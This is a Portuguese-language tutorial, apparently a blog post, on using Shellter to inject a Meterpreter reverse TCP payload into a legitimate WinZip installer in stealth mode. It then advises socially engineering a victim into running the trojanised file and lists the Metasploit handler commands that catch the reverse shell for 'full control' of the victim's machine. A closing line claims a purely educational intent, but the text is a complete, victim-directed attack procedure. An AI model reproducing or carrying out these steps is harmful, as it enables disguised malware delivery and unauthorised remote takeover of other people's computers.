Como injetar código malicioso dentro de arquivos exe usando Shellter

Shellter é uma ferramenta dinâmica de injeção de shellcode usada para injetar cargas úteis em um arquivo executável (EXE) do Windows.
Essa injeção permite disfarçar uma carga útil ou código malicioso em um arquivo executável real. Para demonstrar essa técnica, vou injetar uma carga útil do medidor TCP reverso em um EXE.
Este arquivo inofensivo pode ser qualquer EXE, como o arquivo CCleaner.exe ou o arquivo WinZip.exe. Como você pode imaginar, se você encontrar um método para entregar esse arquivo malicioso a uma pessoa, é possível comprometer o sistema dessa pessoa sem muita dificuldade.
Instalar Shellter
Você pode instalar o Shellter usando o seguinte comando:
apt install shellter
Executar Shellter
Shellter pode ser executado com o seguinte comando de terminal:
shellter
Agora que tenho tudo pronto, posso injetar uma carga útil no instalador do WinZip.

A ferramenta permitirá a escolha entre o modo de operação Auto ou Manual. Vou prosseguir com o método Auto.

O Shellter solicitará o PE Target ou o caminho para o executável. No meu caso, apontarei a ferramenta para o executável que baixei (winzip23-downwz.exe).

Em seguida, você será solicitado a ativar o modo furtivo. Digite 'Y' para sim.

Em seguida, ele solicita que você selecione a carga útil. No meu caso, selecionei 1 para Meterpreter_Reverse_TCP.

Em seguida, você será solicitado a definir LHOST e LPORT. Digite o IP do host local e a porta local. Você pode usar o comando ifconfig para encontrar seu endereço IP.

Finalmente, depois de inserir o endereço e a porta, o aplicativo infecta o instalador.
Enviar arquivo WinZip.exe para a máquina da vítima
Neste ponto, tudo o que você precisa fazer é usar suas habilidades de engenharia social e enviar o arquivo 'winzip23-downwz.exe' para a vítima. Portanto, vamos definir o ouvinte para capturar uma sessão quando a vítima executar o arquivo.
Em um novo terminal, digite msfconsole para iniciar o framework Metasploit e execute os seguintes comandos:
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 8080
msf5> run

A partir daqui, você tem controle total sobre a máquina de destino.
Nota: Saiba que todas as informações são utilizadas para ampliar o conhecimento e não para causar ataques maliciosos ou danosos.
Obrigado por ler este artigo!